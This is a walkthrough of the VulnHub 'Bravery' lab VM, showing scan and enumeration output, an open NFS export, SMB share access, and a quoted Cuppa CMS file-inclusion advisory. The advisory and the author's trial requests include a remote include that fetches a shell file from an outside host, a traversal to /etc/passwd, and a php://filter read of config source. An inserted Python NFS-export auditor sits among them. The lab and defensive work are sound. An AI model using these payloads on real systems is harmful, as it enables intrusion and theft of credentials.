https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/
* The VM image has to be downloaded via torrent
Chapter 1
1. Scanning
[root@takudaddy ~]# nmap 192.168.10.14
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-23 14:47 KST
Nmap scan report for 192.168.10.14
Not shown: 990 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
2049/tcp open nfs
3306/tcp open mysql
8080/tcp open http-proxy
[root@takudaddy ~]# nmap -p- 192.168.10.14
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-23 14:49 KST
Nmap scan report for 192.168.10.14
Host is up (0.000068s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
2049/tcp open nfs
3306/tcp open mysql
8080/tcp open http-proxy
20048/tcp open mountd
39202/tcp open unknown
44315/tcp open unknown
MAC Address: 08:00:27:A5:64:10 (Oracle VirtualBox virtual NIC)
[root@takudaddy ~]# nmap -sV -O 192.168.10.14
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
53/tcp open domain dnsmasq 2.76
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2049/tcp open nfs_acl 3 (RPC #100227)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http nginx 1.12.2
MAC Address: 08:00:27:A5:64:10 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: BRAVERY
[root@takudaddy ~]# nmap -A 192.168.10.14
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-23 14:51 KST
Nmap scan report for 192.168.10.14
Host is up (0.00015s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 4d:8f:bc:01:49:75:83:00:65:a9:53:a9:75:c6:57:33 (RSA)
| 256 92:f7:04:e2:09:aa:d0:d7:e6:fd:21:67:1f:bd:64:ce (ECDSA)
|_ 256 fb:08:cd:e8:45:8c:1a:c1:06:1b:24:73:33:a5:e4:77 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100003 3,4 2049/udp nfs
| 100003 3,4 2049/udp6 nfs
| 100005 1,2,3 20048/tcp mountd
| 100005 1,2,3 20048/tcp6 mountd
| 100005 1,2,3 20048/udp mountd
| 100005 1,2,3 20048/udp6 mountd
| 100021 1,3,4 34591/udp6 nlockmgr
| 100021 1,3,4 34614/udp nlockmgr
| 100021 1,3,4 41985/tcp6 nlockmgr
| 100021 1,3,4 44315/tcp nlockmgr
| 100024 1 39202/tcp status
| 100024 1 46606/tcp6 status
| 100024 1 50957/udp6 status
| 100024 1 52626/udp status
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2018-06-10T15:53:25
|_Not valid after: 2019-06-10T15:53:25
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.7.1 (workgroup: WORKGROUP)
2049/tcp open nfs_acl 3 (RPC #100227)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http nginx 1.12.2
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 4 disallowed entries
|_/cgi-bin/ /qwertyuiop.html /private /public
|_http-server-header: nginx/1.12.2
|_http-title: Welcome to Bravery! This is SPARTA!
MAC Address: 08:00:27:A5:64:10 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: BRAVERY
Host script results:
|_clock-skew: mean: 1h20m03s, deviation: 2h18m34s, median: 2s
|_nbstat: NetBIOS name: BRAVERY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.1)
| Computer name: localhost
| NetBIOS computer name: BRAVERY\x00
| Domain name: \x00
| FQDN: localhost
|_ System time: 2021-03-23T01:51:46-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-03-23T05:51:46
|_ start_date: N/A
: nfs / rpcbind
2. Enumeration
[root@takudaddy /script]# ./webenum.sh 192.168.10.14
=======================================================
Web Enumertation tool
by takudaddy
=======================================================
[ Running ] Nikto against 192.168.10.14
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.10.14
+ Target Hostname: 192.168.10.14
+ Target Port: 80
+ Start Time: 2021-03-23 14:54:52 (GMT9)
---------------------------------------------------------------------------
+ Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OpenSSL/1.0.2k-fips appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ PHP/5.4.16 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Retrieved x-powered-by header: PHP/5.4.16
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8724 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2021-03-23 14:55:37 (GMT9) (45 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
[ Running ] Dirb against 192.168.10.14
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Mar 23 14:55:37 2021
URL_BASE: http://192.168.10.14/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.10.14/ ----
+ http://192.168.10.14/0 (CODE:200|SIZE:2)
+ http://192.168.10.14/1 (CODE:200|SIZE:2)
+ http://192.168.10.14/2 (CODE:200|SIZE:2)
+ http://192.168.10.14/3 (CODE:200|SIZE:2)
+ http://192.168.10.14/4 (CODE:200|SIZE:2)
+ http://192.168.10.14/5 (CODE:200|SIZE:2)
+ http://192.168.10.14/6 (CODE:200|SIZE:2)
+ http://192.168.10.14/7 (CODE:200|SIZE:2)
+ http://192.168.10.14/8 (CODE:200|SIZE:30)
+ http://192.168.10.14/9 (CODE:200|SIZE:2)
+ http://192.168.10.14/about (CODE:200|SIZE:79)
+ http://192.168.10.14/cgi-bin/ (CODE:403|SIZE:210)
+ http://192.168.10.14/contactus (CODE:200|SIZE:27)
+ http://192.168.10.14/phpinfo.php (CODE:200|SIZE:1)
==> DIRECTORY: http://192.168.10.14/uploads/
---- Entering directory: http://192.168.10.14/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Mar 23 14:55:38 2021
DOWNLOADED: 4612 - FOUND: 14
[ Running ] WFUZZ against 192.168.10.14
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.10.14/FUZZ
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000020: 200 1 L 1 W 2 Ch "3"
000000011: 200 1 L 1 W 2 Ch "2"
000000006: 200 1 L 1 W 2 Ch "1"
000000025: 200 1 L 7 W 79 Ch "about"
000000864: 301 7 L 20 W 237 Ch "uploads"
Total time: 0
Processed Requests: 951
Filtered Requests: 946
Requests/sec.: 0
[ Runnung ] enum4linux for SMB against 192.168.10.14
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Mar 23 14:55:39 2021
==========================
| Target Information |
==========================
Target ........... 192.168.10.14
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
==========================================
| Share Enumeration on 192.168.10.14 |
==========================================
Sharename Type Comment
--------- ---- -------
anonymous Disk
secured Disk
IPC$ IPC IPC Service (Samba Server 4.7.1)
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 192.168.10.14
//192.168.10.14/anonymous Mapping: OK, Listing: OK
//192.168.10.14/secured Mapping: DENIED, Listing: N/A
//192.168.10.14/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
=====================================================
| Enumerating Workgroup/Domain on 192.168.10.14 |
=====================================================
[+] Got domain/workgroup name: WORKGROUP
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\david (Local User)
S-1-22-1-1001 Unix User\ossec (Local User)
S-1-22-1-1002 Unix User\ossecm (Local User)
S-1-22-1-1003 Unix User\ossecr (Local User)
S-1-22-1-1004 Unix User\rick (Local User)
: Save the user list to a file!
: //192.168.10.14/anonymous is accessible
# 80
# 8080
/about
/contactus
/cgi-bin
/uploads
:8080/about
https://www.captiongenerator.com/1075692/Try-Harder
3. nfs check
[root@takudaddy /mnt]# nmap -sU -sT 192.168.10.14 -p 2049
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-23 15:26 KST
Nmap scan report for 192.168.10.14
Host is up (0.00019s latency).
PORT STATE SERVICE
2049/tcp open nfs
2049/udp open|filtered nfs
MAC Address: 08:00:27:A5:64:10 (Oracle VirtualBox virtual NIC)
[root@takudaddy ~]# showmount -e 192.168.10.14
Export list for 192.168.10.14:
/var/nfsshare *
/var/nfsshare
Let's mount it on our side and take a look.
[root@takudaddy /mnt]# mount -t nfs 192.168.10.14:/var/nfsshare /mnt/remote
[root@takudaddy /mnt]# ls -al
합계 8
drwxr-xr-x 3 root root 4096 3월 23 15:24 .
drwxr-xr-x 24 root root 4096 3월 18 14:20 ..
drwxrwxrwx 3 nobody nogroup 146 12월 26 2018 remote
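Before mounting, a defender would want to know which exports are offered to every client. The following is an added example (not from the write-up's author or from any tool shown above): it parses the text `showmount -e` prints, splits comma-separated client lists, and grades each export. The first export line is the one observed above; the two extra lines are constructed for the example. It assumes the Linux `showmount` convention that `*` is an explicit wildcard and `(everyone)` marks an export with no client restriction.

```python
"""Audit showmount -e output for NFS exports reachable by any client.

Added example for this write-up; it is not from the page's author or any
tool shown above. It parses the "Export list" text printed by showmount,
splits comma-separated client specifications, and grades each export so a
defender can spot entries like "/var/nfsshare *" before an unauthenticated
host mounts them.
"""
from dataclasses import dataclass
from typing import List, Tuple

# The first export line is the one observed on the target above; the other two
# are constructed for this example.
SAMPLE_SHOWMOUNT = """\
Export list for 192.168.10.14:
/var/nfsshare *
/srv/backup 10.0.0.0/24,backup01.example.internal
/home/shared (everyone)
"""

# Tokens that mean "no client restriction": "*" is an explicit wildcard in
# /etc/exports, "(everyone)" is what Linux showmount prints when an export
# carries no client list at all (assumption about showmount's output format).
ANY_HOST = {"*", "(everyone)"}


@dataclass
class Export:
    path: str
    clients: List[str]


def parse_showmount(output: str) -> List[Export]:
    """Turn showmount -e text into Export records (path + client specs)."""
    exports = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Export list"):
            continue
        path, *specs = line.split()
        # showmount joins several clients for one export with commas
        clients = [c for spec in specs for c in spec.split(",") if c]
        exports.append(Export(path, clients))
    return exports


def audit_exports(output: str) -> List[Tuple[str, str, str]]:
    """Return (path, severity, reason) for every export worth reviewing."""
    findings = []
    for exp in parse_showmount(output):
        for client in exp.clients:
            if client in ANY_HOST:
                findings.append((exp.path, "high", f"exported to any host ({client})"))
            elif "*" in client or "?" in client:
                findings.append((exp.path, "medium", f"wildcard host pattern {client}"))
            elif "/" in client:
                findings.append((exp.path, "low", f"whole subnet {client}"))
    return findings


if __name__ == "__main__":
    for path, severity, reason in audit_exports(SAMPLE_SHOWMOUNT):
        print(f"[{severity:6}] {path}: {reason}")
```

Run it against the saved output of `showmount -e <host>`; an export graded `high` is mountable by anyone who can reach port 2049, which is exactly what the `drwxrwxrwx nobody nogroup` listing above confirms for `/var/nfsshare`.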
4. penetration
Let's go into that directory.
[root@takudaddy /mnt]# cd remote
[root@takudaddy /mnt/remote]# ls
README.txt discovery enumeration explore itinerary password.txt qwertyuioplkjhgfdsazxcvbnm
[root@takudaddy /mnt/remote]# ls -al
합계 28
drwxrwxrwx 3 nobody nogroup 146 12월 26 2018 .
drwxr-xr-x 3 root root 4096 3월 23 15:24 ..
-rw-r--r-- 1 root root 15 12월 26 2018 README.txt
-rw-r--r-- 1 root root 29 12월 26 2018 discovery
-rw-r--r-- 1 root root 51 12월 26 2018 enumeration
-rw-r--r-- 1 root root 20 12월 26 2018 explore
drwxr-xr-x 2 root root 19 12월 26 2018 itinerary
-rw-r--r-- 1 root root 104 12월 26 2018 password.txt
-rw-r--r-- 1 root root 67 12월 26 2018 qwertyuioplkjhgfdsazxcvbnm
[root@takudaddy /mnt/remote]# cat README.txt
read me first!
[root@takudaddy /mnt/remote]# cat password.txt
Passwords should not be stored in clear-text, written in post-its or written on files on the hard disk!
[root@takudaddy /mnt/remote]# cat qwertyuioplkjhgfdsazxcvbnm
Sometimes, the answer you seek may be right before your very eyes.
[root@takudaddy /mnt/remote]# cat explore
Exploration is fun!
[root@takudaddy /mnt/remote]# cat enumeration
Enumeration is at the heart of a penetration test!
[root@takudaddy /mnt/remote]# cat discovery
Remember to LOOK AROUND YOU!
[root@takudaddy /mnt/remote]# cd itinerary/
[root@takudaddy /mnt/remote/itinerary]# ls
david
[root@takudaddy /mnt/remote/itinerary]# ls -al
합계 4
drwxr-xr-x 2 root root 19 12월 26 2018 .
drwxrwxrwx 3 nobody nogroup 146 12월 26 2018 ..
-rw-r--r-- 1 root root 1733 12월 26 2018 david
[root@takudaddy /mnt/remote/itinerary]# cat david
David will need to fly to various cities for various conferences. Here is his schedule.
1 January 2019 (Tuesday):
New Year's Day. Spend time with family.
2 January 2019 (Wednesday):
0900: Depart for airport.
0945: Check in at Changi Airport, Terminal 3.
1355 - 2030 hrs (FRA time): Board flight (SQ326) and land in Frankfurt.
2230: Check into hotel.
3 January 2019 (Thursday):
0800: Leave hotel.
0900 - 1700: Attend the Banking and Enterprise Conference.
1730 - 2130: Private reception with the Chancellor.
2230: Retire in hotel.
4 January 2019 (Friday):
0800: Check out from hotel.
0900: Check in at Frankfurt Main.
1305 - 1355: Board flight (LH1190) and land in Zurich.
1600 - 1900: Dinner reception
2000: Check into hotel.
5 January 2019 (Saturday):
0800: Leave hotel.
0930 - 1230: Visit University of Zurich.
1300 - 1400: Working lunch with Mr. Pandelson
1430 - 1730: Dialogue with students at the University of Zurich.
1800 - 2100: Working dinner with Mr. Robert James Miller and wife.
2200: Check into hotel.
6 January 2019 (Sunday):
0730: Leave hotel.
0800 - 1100: Give a lecture on Software Security and Design at the University of Zurich.
1130: Check in at Zurich.
1715 - 2025: Board flight (LX18) and land in Newark.
2230: Check into hotel.
7 January 2019 (Monday):
0800: Leave hotel.
0900 - 1200: Visit Goldman Sachs HQ
1230 - 1330: Working lunch with Bill de Blasio
1400 - 1700: Visit McKinsey HQ
1730 - 1830: Visit World Trade Center Memorial
2030: Return to hotel.
8 January 2019 (Tuesday):
0630: Check out from hotel.
0730: Check in at Newark.
0945 - 1715 (+1): Board flight (SQ21)
9 January 2019 (Wednesday):
1715: Land in Singapore.
1815 - 2015: Dinner with wife.
2100: Clear local emails and head to bed.
Save the suspicious words:
david
qwertyuioplkjhgfdsazxcvbnm
Just in case, I copied the SSH key and tried to log in, but it didn't work.
Chapter 2.
Come to think of it, I hadn't scanned port 8080.
1. Web enumeration
[root@takudaddy /script]# ./webenum.sh 192.168.10.14:8080
=======================================================
Web Enumertation tool
by takudaddy
=======================================================
[ Running ] Nikto against 192.168.10.14:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.10.14
+ Target Hostname: 192.168.10.14
+ Target Port: 8080
+ Start Time: 2021-03-23 16:01:57 (GMT9)
---------------------------------------------------------------------------
+ Server: nginx/1.12.2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/qwertyuiop.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/public/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 4 entries which should be manually viewed.
+ /cgi-bin/blog/mt.cfg: Movable Type configuration file found. Should not be available remotely.
+ /cgi-bin/mt-static/mt.cfg: Movable Type configuration file found. Should not be available remotely.
+ /cgi-bin/mt/mt.cfg: Movable Type configuration file found. Should not be available remotely.
+ OSVDB-3092: /public/: This might be interesting...
+ /httpd.conf: Apache httpd.conf configuration file
+ /httpd.conf.bak: Apache httpd.conf configuration file
+ 9541 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2021-03-23 16:02:08 (GMT9) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
[ Running ] Dirb against 192.168.10.14:8080
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Mar 23 16:02:08 2021
URL_BASE: http://192.168.10.14:8080/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.10.14:8080/ ----
+ http://192.168.10.14:8080/about (CODE:200|SIZE:503)
+ http://192.168.10.14:8080/index.html (CODE:200|SIZE:2637)
==> DIRECTORY: http://192.168.10.14:8080/private/
==> DIRECTORY: http://192.168.10.14:8080/public/
+ http://192.168.10.14:8080/robots.txt (CODE:200|SIZE:103)
---- Entering directory: http://192.168.10.14:8080/private/ ----
(!) WARNING: All responses for this directory seem to be CODE = 403.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.10.14:8080/public/ ----
==> DIRECTORY: http://192.168.10.14:8080/public/css/
==> DIRECTORY: http://192.168.10.14:8080/public/fonts/
==> DIRECTORY: http://192.168.10.14:8080/public/img/
+ http://192.168.10.14:8080/public/index.html (CODE:200|SIZE:22963)
==> DIRECTORY: http://192.168.10.14:8080/public/js/
---- Entering directory: http://192.168.10.14:8080/public/css/ ----
==> DIRECTORY: http://192.168.10.14:8080/public/css/theme/
---- Entering directory: http://192.168.10.14:8080/public/fonts/ ----
---- Entering directory: http://192.168.10.14:8080/public/img/ ----
==> DIRECTORY: http://192.168.10.14:8080/public/img/elements/
---- Entering directory: http://192.168.10.14:8080/public/js/ ----
==> DIRECTORY: http://192.168.10.14:8080/public/js/vendor/
---- Entering directory: http://192.168.10.14:8080/public/css/theme/ ----
---- Entering directory: http://192.168.10.14:8080/public/img/elements/ ----
---- Entering directory: http://192.168.10.14:8080/public/js/vendor/ ----
-----------------
END_TIME: Tue Mar 23 16:02:20 2021
DOWNLOADED: 41608 - FOUND: 4
[ Running ] WFUZZ against 192.168.10.14:8080
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.10.14:8080/FUZZ
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000025: 200 19 L 90 W 503 Ch "about"
000000654: 301 7 L 12 W 185 Ch "public"
000000636: 301 7 L 12 W 185 Ch "private"
Total time: 0
Processed Requests: 951
Filtered Requests: 948
Requests/sec.: 0
: robots.txt
/qwertyuiop.html
/public
/private
OSVDB-3092
Found. Let's take a look.
nginx/1.12.2
https://www.securityfocus.com/bid/63814/info
: Nothing much gained
Chapter 3
Of the information found so far, the things not yet tried are
//192.168.10.14/anonymous
//192.168.10.14/secured
and the suspected password
qwertyuioplkjhgfdsazxcvbnm
Let's use these to connect with smbclient.
[root@takudaddy ~/brave]# smbclient //192.168.10.14/anonymous
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \>
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
smb: \>
smb: \> ls
. D 0 Fri Sep 28 22:01:35 2018
.. D 0 Fri Jun 15 01:30:39 2018
patrick's folder D 0 Fri Sep 28 21:38:27 2018
qiu's folder D 0 Fri Sep 28 22:27:20 2018
genevieve's folder D 0 Fri Sep 28 22:08:31 2018
david's folder D 0 Wed Dec 26 11:19:51 2018
kenny's folder D 0 Fri Sep 28 21:52:49 2018
qinyi's folder D 0 Fri Sep 28 21:45:22 2018
sara's folder D 0 Fri Sep 28 22:34:23 2018
readme.txt N 489 Fri Sep 28 22:54:03 2018
17811456 blocks of size 1024. 13178428 blocks available
smb: \>
smb: \> get readme.txt
getting file \readme.txt of size 489 as readme.txt (238.8 KiloBytes/sec) (average 238.8 KiloBytes/sec)
smb: \> quit
[root@takudaddy ~/brave]# ls
38846.txt 9829.txt readme.txt req.txt user.txt
[root@takudaddy ~/brave]# cat readme.txt
-- READ ME! --
This is an INTERNAL file-sharing system across SMB. While awaiting migration to Sharepoint, we are currently relying on the use of the SMB protocol to share information.
Once we migrate everything to Sharepoint, we will kill off this temporary service. This service will be re-purposes to only share UNCLASSIFIED information.
We also noticed the archival of plenty of e-mail. Please remove all of that before migration, unless you need them.
Regards
Genevieve the Brave
Success.
This time let's try the secured share.
[root@takudaddy ~/brave]# smbclient //192.168.10.14/secured
Enter WORKGROUP\root's password:
tree connect failed: NT_STATUS_ACCESS_DENIED
[root@takudaddy ~/brave]# smbclient //192.168.10.14/secured -U david
Enter WORKGROUP\david's password:
session setup failed: NT_STATUS_LOGON_FAILURE
[root@takudaddy ~/brave]# smbclient //192.168.10.14/secured -U David
Enter WORKGROUP\David's password:
Try "help" to get a list of possible commands.
smb: \>
smb: \> ls
. D 0 Fri Sep 28 22:52:14 2018
.. D 0 Fri Jun 15 01:30:39 2018
david.txt N 376 Sat Jun 16 17:36:07 2018
genevieve.txt N 398 Tue Jul 24 01:51:27 2018
README.txt N 323 Tue Jul 24 10:58:53 2018
17811456 blocks of size 1024. 13178704 blocks available
smb: \> mget *
Get file david.txt? y
getting file \david.txt of size 376 as david.txt (367.2 KiloBytes/sec) (average 367.2 KiloBytes/sec)
Get file genevieve.txt? y
getting file \genevieve.txt of size 398 as genevieve.txt (194.3 KiloBytes/sec) (average 252.0 KiloBytes/sec)
Get file README.txt? y
getting file \README.txt of size 323 as README.txt (157.7 KiloBytes/sec) (average 214.3 KiloBytes/sec)
smb: \>
smb: \> quit
[root@takudaddy ~/brave]# ls
38846.txt 9829.txt README.txt david.txt genevieve.txt readme.txt req.txt user.txt
[root@takudaddy ~/brave]# cat david.txt
I have concerns over how the developers are designing their webpage. The use of "developmentsecretpage" is too long and unwieldy. We should cut short the addresses in our local domain.
1. Reminder to tell Patrick to replace "developmentsecretpage" with "devops".
2. Request the intern to adjust her Favourites to http://<developmentIPandport>/devops/directortestpagev1.php.
[root@takudaddy ~/brave]#
[root@takudaddy ~/brave]# cat genevieve.txt
Hi! This is Genevieve!
We are still trying to construct our department's IT infrastructure; it's been proving painful so far.
If you wouldn't mind, please do not subject my site (http://192.168.254.155/genevieve) to any load-test as of yet. We're trying to establish quite a few things:
a) File-share to our director.
b) Setting up our CMS.
c) Requesting for a HIDS solution to secure our host.
[root@takudaddy ~/brave]#
[root@takudaddy ~/brave]# cat README.txt
README FOR THE USE OF THE BRAVERY MACHINE:
Your use of the BRAVERY machine is subject to the following conditions:
1. You are a permanent staff in Good Tech Inc.
2. Your rank is HEAD and above.
3. You have obtained your BRAVERY badges.
For more enquiries, please log into the CMS using the correct magic word: goodtech.
[root@takudaddy ~/brave]#
Success!
We got some information.
developmentsecretpage
http://<developmentIPandport>/devops/directortestpagev1.php.
http://192.168.254.155/genevieve
magic word: goodtech.
cuppa cms?
[root@takudaddy ~/brave]# searchsploit cuppa cms
------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------ ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt
------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
[root@takudaddy ~/brave]# searchsploit -m php/webapps/25971.txt
Exploit: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion
URL: https://www.exploit-db.com/exploits/25971
Path: /usr/share/exploitdb/exploits/php/webapps/25971.txt
File Type: ASCII text, with very long lines, with CRLF line terminators
Copied to: /root/brave/25971.txt
[root@takudaddy ~/brave]# cat 25971.txt
# Exploit Title : Cuppa CMS File Inclusion
# Date : 4 June 2013
# Exploit Author : CWH Underground
# Site : www.2600.in.th
# Vendor Homepage : http://www.cuppacms.com/
# Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
# Version : Beta
# Tested on : Window and Linux
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
####################################
VULNERABILITY: PHP CODE INJECTION
####################################
/alerts/alertConfigField.php (LINE: 22)
-----------------------------------------------------------------------------
LINE 22:
<?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------
#####################################################
DESCRIPTION
#####################################################
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
#####################################################
EXPLOIT
#####################################################
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Moreover, We could access Configuration.php source code via PHPStream
For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
So PHP code injection is possible.
Let's try it as described.
alertConfigField.php?urlConfig=takudaddy.tistory.com/
alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
